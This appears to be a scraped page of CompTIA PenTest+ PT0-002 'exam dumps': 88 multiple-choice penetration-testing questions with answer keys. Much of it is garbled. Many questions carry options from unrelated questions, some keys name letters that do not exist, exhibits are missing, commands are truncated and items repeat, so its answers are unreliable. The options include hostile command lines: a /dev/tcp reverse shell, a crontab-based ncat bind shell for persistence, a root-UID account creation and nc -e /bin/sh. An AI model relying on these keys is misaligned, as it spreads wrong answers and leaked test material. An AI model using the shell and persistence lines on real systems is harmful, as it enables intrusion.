Updated CompTIA PenTest+ PT0-002 Exam Dumps – Your Path to Success

For the CompTIA PenTest+ PT0-002 certification, utilizing reliable exam resources is paramount for thorough exam preparation. Access to a vast pool of accurate practice test questions and answers enables you to identify knowledge gaps and strengthen areas of weakness. Reputable study materials, including comprehensive study guides and video courses, provide in-depth explanations of penetration testing concepts. Mock exams simulating the real test environment help you gain familiarity with the exam format and manage time effectively. Regular practice with these exam resources bolsters your confidence and enhances your ability to apply penetration testing methodologies during the actual exam. Combining high-quality study materials, practice tests, and mock exams equips you with the necessary skills and knowledge to pass the CompTIA PenTest+ PT0-002 exam successfully.

Question #1
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
A. See explanation below
Correct Answer: A
Question #2
Deconfliction is necessary when the penetration test:
A. determines that proprietary information is being stored in cleartext
B. occurs during the monthly vulnerability scanning
C. uncovers indicators of prior compromise over the course of the assessment
D. proceeds in parallel with a criminal digital forensic investigation
Correct Answer: D
Question #3
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?
A. OpenVAS
B. Nikto
C. SQLmap
D. Nessus
Correct Answer: C
Question #4
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the HIGHEST likelihood of success?
A. Attempting to tailgate an employee who is going into the client's workplace
B. Dropping a malicious USB key with the company's logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management
Correct Answer: D
Question #5
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network
B. Supervisors and controllers are on a separate virtual network by default
C. Controllers will not validate the origin of commands
D. Supervisory systems will detect a malicious injection of code/commands
Correct Answer: C
Question #6
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/bash_history > ~/
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM "apache" /F
Correct Answer: B
Question #7
A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?
A. Check the scoping document to determine if exfiltration is within scope
B. Stop the penetration test
C. Escalate the issue
D. Include the discovery and interaction in the daily report
Correct Answer: C
Question #8
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
A. Shodan
B. Nmap
C. WebScarab-NG
D. Nessus
Correct Answer: A
Question #9
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
Correct Answer: B
Question #10
The results of an Nmap scan are as follows: Which of the following would be the BEST conclusion about this device?
A. Clarify the statement of work
B. Obtain an asset inventory from the client
C. Interview all stakeholders
D. Identify all third parties involved
Correct Answer: B
Question #11
The following line-numbered Python code snippet is being used in reconnaissance: Which of the following line numbers from the script MOST likely contributed to the script triggering a `probable port scan` alert in the organization's IDS?
A. Line 01
B. Line 02
C. Line 07
D. Line 08
E. Line 12
Correct Answer: A
Question #12
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
A. Unsupported operating systems
B. Susceptibility to DDoS attacks
C. Inability to network
D. The existence of default passwords
Correct Answer: D
Question #13
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following MOST likely describes what happened?
A. The penetration tester was testing the wrong assets
B. The planning process failed to ensure all teams were notified
C. The client was not ready for the assessment to start
D. The penetration tester had incorrect contact information
Correct Answer: B
Question #14
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective?
A. nmap -sT -vvv -O 192
B. nmap -sV 192
C. nmap -sA -v -O 192
D. nmap -sS -O 192
Correct Answer: D
Question #15
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
A. Command injection
B. Broken authentication
C. Direct object reference
D. Cross-site scripting
Correct Answer: C
Question #16
A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)
A. Clickjacking
B. Session hijacking
C. Parameter pollution
D. Cookie hijacking
E. Cross-site scripting
Correct Answer: CD
Question #17
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?
A. Maximizing the likelihood of finding vulnerabilities
B. Reprioritizing the goals/objectives
C. Eliminating the potential for false positives
D. Reducing the risk to the client environment
Correct Answer: B
Question #18
Which of the following assessment methods is MOST likely to cause harm to an ICS environment?
A. Sniff and then crack the WPS PIN on an associated WiFi device
B. Dump the user address book on the device
C. Break a connection between two Bluetooth devices
D. Transmit text messages to the device
Correct Answer: A
Question #19
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
A. Executive summary of the penetration-testing methods used
B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe typecasting operations
Correct Answer: D
Question #20
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. Edit the discovered file with one line of code for remote callback
B. Download
C. Edit the smb
D. Download the smb
Correct Answer: C
Question #21
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?
A. Multiple handshakes
B. IP addresses
C. Encrypted file transfers
D. User hashes sent over SMB
Correct Answer: D
Question #22
HOTSPOT (Drag and Drop is not supported)
You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTION
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:
A. See Explanation section for answer
Correct Answer: A
Question #23
A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?
A. nmap -iL results 192
B. nmap 192
C. nmap -A 192
D. nmap 192
Correct Answer: C
Question #24
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?
A. Steganography
B. Metadata removal
C. Encryption
D. Encode64
Correct Answer: A
Question #25
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/bash_history > ~/
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM "apache" /F
Correct Answer: B
Question #26
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. chmod u+x script
B. chmod u+e script
C. chmod o+e script
D. chmod o+x script
Correct Answer: A
Question #27
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
A. Smurf
B. Ping flood
C. Fraggle
D. Ping of death
Correct Answer: C
Question #28
Which of the following situations would MOST likely warrant revalidation of a previous security assessment?
A. After detection of a breach
B. After a merger or an acquisition
C. When an organization updates its network firewall configurations
D. When most of the vulnerabilities have been remediated
Correct Answer: B
Question #29
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
A. Windows
B. Apple
C. Linux
D. Android
Correct Answer: A
Question #30
A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report?
A. Delete the scheduled batch job
B. Close the reverse shell connection
C. Downgrade the svsaccount permissions
D. Remove the tester-created credentials
Correct Answer: D
Question #31
A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?
A. Hashcat
B. Mimikatz
C. Patator
D. John the Ripper
Correct Answer: C
Question #32
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
A. A signed statement of work
B. The correct user accounts and associated passwords
C. The expected time frame of the assessment
D. The proper emergency contacts for the client
Correct Answer: D
Question #33
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.)
A. SOW
B. SLA
C. ROE
D. NDA
Correct Answer: BC
Question #34
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?
A. Add a dependency checker into the tool chain
B. Perform routine static and dynamic analysis of committed code
C. Validate API security settings before deployment
D. Perform fuzz testing of compiled binaries
Correct Answer: A
Question #35
An Nmap scan of a network switch reveals the following: Which of the following technical controls will most likely be the FIRST recommendation for this device?
A. Encrypted passwords
B. System-hardening techniques
C. Multifactor authentication
D. Network segmentation
Correct Answer: B
Question #36
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?
A. Wait for the next login and perform a downgrade attack on the server
B. Capture traffic using Wireshark
C. Perform a brute-force attack over the server
D. Use an FTP exploit against the server
Correct Answer: B
Question #37
Appending string values onto another string is called:
A. compilation
B. connection
C. concatenation
D. conjunction
Correct Answer: C
Question #38
A compliance-based penetration test is primarily concerned with:
A. obtaining PII from the protected network
B. bypassing protection on edge devices
C. determining the efficacy of a specific set of security standards
D. obtaining specific information from the protected network
Correct Answer: C
Question #39
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees' numbers?
A. Web archive
B. GitHub
C. File metadata
D. Underground forums
Correct Answer: A
Question #40
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?
A. nc 10
B. powershell -exec bypass -f \\\\10
C. bash -i >& /dev/tcp/10
D. wget 10
Correct Answer: A
Question #41
Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:
A. devices produce more heat and consume more power
B. devices are obsolete and are no longer available for replacement
C. protocols are more difficult to understand
D. devices may cause physical world effects
Correct Answer: D
Question #42
A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?
A. nmap -sn 10
B. nmap -sV -A 10
C. nmap -Pn 10
D. nmap -sT -p- 10
Correct Answer: A
Question #43
A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output?
A. The HTTP port is not open on the firewall
B. The tester did not run sudo before the command
C. The web server is using HTTPS instead of HTTP
D. This URI returned a server error
Correct Answer: D
Question #44
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log: Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
A. Run an application vulnerability scan and then identify the TCP ports used by the application
B. Run the application attached to a debugger and then review the application's log
C. Disassemble the binary code and then identify the break points
D. Start a packet capture with Wireshark and then run the application
Correct Answer: D
Question #45
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following: Which of the following combinations of tools would the penetration tester use to exploit this script?
A. Hydra and crunch
B. Netcat and cURL
C. Burp Suite and DIRB
D. Nmap and OWASP ZAP
Correct Answer: B
Question #46
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?
A. Understanding the tactics of a security intrusion can help disrupt them
B. Scripts that are part of the framework can be imported directly into SIEM tools
C. The methodology can be used to estimate the cost of an incident better
D. The framework is static and ensures stability of a security program over time
Correct Answer: A
Question #47
A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?
A. Tailgating
B. Dumpster diving
C. Shoulder surfing
D. Badge cloning
Correct Answer: D
Question #48
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. Edit the discovered file with one line of code for remote callback
B. Download
C. Edit the smb
D. Download the smb
Correct Answer: AC
Question #49
A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network. Which of the following methods will MOST likely work?
A. Try to obtain the private key used for S/MIME from the CEO's account
B. Send an email from the CEO's account, requesting a new account
C. Move laterally from the mail server to the domain controller
D. Attempt to escalate privileges on the mail server to gain root access
Correct Answer: D
Question #50
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
A. security compliance regulations or laws may be violated
B. testing can make detecting actual APT more challenging
C. testing adds to the workload of defensive cyber- and threat-hunting teams
D. business and network operations may be impacted
Correct Answer: D
Question #51
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
A. security compliance regulations or laws may be violated
B. testing can make detecting actual APT more challenging
C. testing adds to the workload of defensive cyber- and threat-hunting teams
D. business and network operations may be impacted
Correct Answer: D
Question #52
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?
A. Specially craft and deploy phishing emails to key company leaders
B. Run a vulnerability scan against the company's external website
C. Runtime the company's vendor/supply chain
D. Scrape web presences and social-networking sites
Correct Answer: D
Question #53
A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment. Which of the following would be the BEST option to identify a system properly prior to performing the assessment?
A. Asset inventory
B. DNS records
C. Web-application scan
D. Full scan
Correct Answer: A
Question #54
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
A. Send deauthentication frames to the stations
B. Perform jamming on all 2
C. Set the malicious AP to broadcast within dynamic frequency selection channels
D. Modify the malicious AP configuration to not use a preshared key
Correct Answer: C
Question #55
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. nc 10
B. powershell -exec bypass -f \\10
C. bash -i >& /dev/tcp/10
D. wget 10
Correct Answer: D
Question #56
A penetration tester captured the following traffic during a web-application test: Which of the following methods should the tester use to visualize the authorization information being transmitted?
A. Decode the authorization header using UTF-8
B. Decrypt the authorization header using bcrypt
C. Decode the authorization header using Base64
D. Decrypt the authorization header using AES
Correct Answer: C
Question #57
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
A. schtasks /create /sc /ONSTART /tr C:\\Temp|WindowsUpdate
B. wmic startup get caption,command
C. crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
Correct Answer: A
Question #58
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
A. Analyze the malware to see what it does
B. Collect the proper evidence and then remove the malware
C. Do a root-cause analysis to find out how the malware got in
D. Remove the malware immediately
E. Stop the assessment and inform the emergency contact
Correct Answer: E
Question #59
A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?
A. SQLmap
B. DirBuster
C. w3af
D. OWASP ZAP
Correct Answer: D
Question #60
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following: Which of the following tools would be BEST for the penetration tester to use to explore this site further?
A. Burp Suite
B. DirBuster
C. WPScan
D. OWASP ZAP
Correct Answer: C
Question #61
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
Correct Answer: B
Question #62
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted dat
A. Whether sensitive client data is publicly accessible
B. Whether the connection between the cloud and the client is secure
C. Whether the client's employees are trained properly to use the platform
D. Whether the cloud applications were developed using a secure SDLC
Correct Answer: A
Question #63
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Which of the following is most important for the penetration tester to defin
A. Establish the format required by the client
B. Establish the threshold of risk to escalate to the client immediately
C. Establish the method of potential false positives
D. Establish the preferred day of the week for reporting
Correct Answer: B
Question #64
A penetration tester obtained the following results after scanning a web server using the dirb utility: Which of the following elements is MOST likely to contain useful information for the penetration tester?
A. index
B. about
C. info
D. home
Correct Answer: B
Question #65
A penetration tester has prepared the following phishing email for an upcoming penetration test: Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
A. Familiarity and likeness
B. Authority and urgency
C. Scarcity and fear
D. Social proof and greed
Correct Answer: B
Question #66
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?
A. Acceptance by the client and sign-off on the final report
B. Scheduling of follow-up actions and retesting
C. Attestation of findings and delivery of the report
D. Review of the lessons during the engagement
Correct Answer: A
Question #67
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?
A. Phishing
B. Tailgating
C. Baiting
D. Shoulder surfing
Correct Answer: C
Question #68
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?
A. Halt the penetration test
B. Conduct an incident response
C. Deconflict with the penetration tester
D. Assume the alert is from the penetration test
Correct Answer: C
Question #69
A penetration tester gains access to a system and is able to migrate to a user process: Given the output above, which of the following actions is the penetration tester performing? (Choose two.)
A. The tester input the incorrect IP address
B. The command requires the -port 135 option
C. An account for RDP does not exist on the server
D. PowerShell requires administrative privilege
Correct Answer: CD
Question #70
Which of the following expressions in Python increase a variable val by one? (Choose two.)
A. nmap -T3 192
B. nmap -P0 192
C. nmap -T0 192
D. nmap -A 192
Correct Answer: CF
Question #71
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?
A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel
Correct Answer: A
Question #72
SIMULATION
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A. See explanation below
Correct Answer: A
Question #73
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier. Which of the following is the BEST action for the penetration tester to take?
A. Utilize the tunnel as a means of pivoting to other internal devices
B. Disregard the IP range, as it is out of scope
C. Stop the assessment and inform the emergency contact
D. Scan the IP range for additional systems to exploit
Correct Answer: C
Question #74
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?
A. Weak authentication schemes
B. Credentials stored in strings
C. Buffer overflows
D. Non-optimized resource management
Correct Answer: C
Question #75
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. chmod u+x script
B. chmod u+e script
C. chmod o+e script
D. chmod o+x script
Correct Answer: A
Question #76
A penetration tester discovers a web server that is within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
A. Forensically acquire the backdoor Trojan and perform attribution
B. Utilize the backdoor in support of the engagement
C. Continue the engagement and include the backdoor finding in the final report
D. Inform the customer immediately about the backdoor
Correct Answer: D
Question #77
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly. Which of the following changes should the tester apply to make the script work as intended?
A. Change line 2 to $ip= "10
B. Remove lines 3, 5, and 6
C. Remove line 6
D. Move all the lines below line 7 to the top of the script
Correct Answer: A
Question #78
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?
A. Cost of the assessment
B. Report distribution
C. Testing restrictions
D. Liability
Correct Answer: C
Question #79
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine: Which of the following would be the BEST command to use for further progress into the targeted network?
A. nc 10
B. ssh 10
C. nc 127
D. ssh 127
Correct Answer: C
Question #80
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
A. Create a one-shot system service to establish a reverse shell
B. Obtain /etc/shadow and brute force the root password
C. Run the nc -e /bin/sh <…> command
D. Move laterally to create a user account on LDAP
Correct Answer: A
Question #81
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment?
A. Partially known environment testing
B. Known environment testing
C. Unknown environment testing
D. Physical environment testing
Correct Answer: C
Question #82
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades-old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan?
A. The timing of the scan
B. The bandwidth limitations
C. The inventory of assets and versions
D. The type of scan
Correct Answer: C
Question #83
A penetration tester has prepared the following phishing email for an upcoming penetration test: Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
A. Familiarity and likeness
B. Authority and urgency
C. Scarcity and fear
D. Social proof and greed
Correct Answer: B
Question #84
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position. Which of the following actions, if performed, would be ethical within the scope of the assessment?
A. Exploiting a configuration weakness in the SQL database
B. Intercepting outbound TLS traffic
C. Gaining access to hosts by injecting malware into the enterprise-wide update server
D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
E. Establishing and maintaining persistence on the domain controller
Correct Answer: A
Question #85
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory
B. This device is most likely a gateway with in-band management services
C. This device is most likely a proxy server forwarding requests over TCP/443
D. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation
Correct Answer: BE
Question #86
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
A. Run nmap with the -O, -p22, and -sC options set against the target
B. Run nmap with the -sV and -p22 options set against the target
C. Run nmap with the --script vulners option set against the target
D. Run nmap with the -sA option set against the target
Correct Answer: D
Question #87
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
A. nmap 192
B. nmap 192
C. nmap 192
D. nmap 192
Correct Answer: C
Question #88
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU
Correct Answer: C
